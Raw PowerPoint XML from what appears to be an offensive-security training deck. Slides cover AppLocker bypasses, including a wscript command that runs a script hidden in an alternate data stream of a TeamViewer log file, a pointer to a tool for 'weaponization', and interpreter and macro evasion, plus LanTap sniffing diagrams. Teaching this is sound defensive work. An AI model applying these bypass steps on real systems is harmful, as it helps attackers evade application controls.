                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>03/09/2020  08:34 AM            32,489 TeamViewer12_Logfile.log</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                    79 TeamViewer12_Logfile.log:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>test.js:$DATA1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> File(s)         32,489 bytes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>               0 Dir(s)     696,483,840 bytes free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426272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154C-D17D-7B23-89B7-9237A2768668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Network Sniffing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LanTap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10421324-FB8E-4B64-A014-1BC8A07C65AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Lan Tap Allows for sniffing only TO or FROM the device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This helps to focus analysis on items being SENT of RECEIVED from the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EX:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A &gt;&gt;&gt;&gt; B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B &gt;&gt;&gt;&gt; A</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215974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1291-A06D-DE5D-6358-894B928FCA87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternate Data Streams (still works)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDCE830-D9C6-6F6E-DD14-B923A0101933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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If the file is clicked, it will open the original file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the file is opened with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and it specifies the Alternate Data Stream (ADS), it will execute the payload attached to the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this case, the payload will execute, bypassing AppLocker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WEAPONOZATION FURTHER: Check out THIS project: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/tyranid/DotNetToJScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This tool will allow you to execute C# objects through Jscript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>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29247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1291-A06D-DE5D-6358-894B928FCA87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Party Execution (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MalDocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Anyone?)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDCE830-D9C6-6F6E-DD14-B923A0101933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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If an interpreter like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is installed , it can be used to bypass AppLocker. </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Similarly, AppLocker does not block execution of high-level languages like Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This requires the JRE to be installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>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More interesting is that there is a lack of enforcement against code in VBA macros inside Office Documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If a document is saved to a non-whitelisted folder, AppLocker cannot restrict the execution of the embedded macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277489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154C-D17D-7B23-89B7-9237A2768668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Network Sniffing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LanTap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10421324-FB8E-4B64-A014-1BC8A07C65AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A computer with an arrow pointing up&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B806A5-FEE0-557D-0EBF-C9E993777EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5601463" y="1450110"/>
            <a:ext cx="989074" cy="4726853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BB8896-A638-3C3B-4225-2D36B8CF427E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7077343" y="1695189"/>
            <a:ext cx="851965" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43AFC448-83C9-DD74-134F-F096D4816BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7155809" y="3195161"/>
            <a:ext cx="886846" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Laptop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E05C32-1B5D-A4E8-BEE2-6FEBA704888A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154783" y="4749363"/>
            <a:ext cx="887872" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LanTap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B6B489-A621-0715-2C0B-852C89492573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7175366" y="5880003"/>
            <a:ext cx="867289" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198546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154C-D17D-7B23-89B7-9237A2768668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Network Sniffing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LanTap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Router)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10421324-FB8E-4B64-A014-1BC8A07C65AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BB8896-A638-3C3B-4225-2D36B8CF427E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484631" y="3429000"/>
            <a:ext cx="851965" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43AFC448-83C9-DD74-134F-F096D4816BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963023" y="2053054"/>
            <a:ext cx="886846" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Laptop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E05C32-1B5D-A4E8-BEE2-6FEBA704888A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448724" y="1825625"/>
            <a:ext cx="887872" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LanTap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B6B489-A621-0715-2C0B-852C89492573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484631" y="4913868"/>
            <a:ext cx="867289" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A diagram of a computer and router&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69185624-2419-78B9-9A05-2AE39CF816E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238500" y="1574800"/>
            <a:ext cx="2857500" cy="3708400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139308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154C-D17D-7B23-89B7-9237A2768668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exercise: What is going on?  (5 minutes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10421324-FB8E-4B64-A014-1BC8A07C65AB}"/>
              </a:ext>
            </a:extLst>
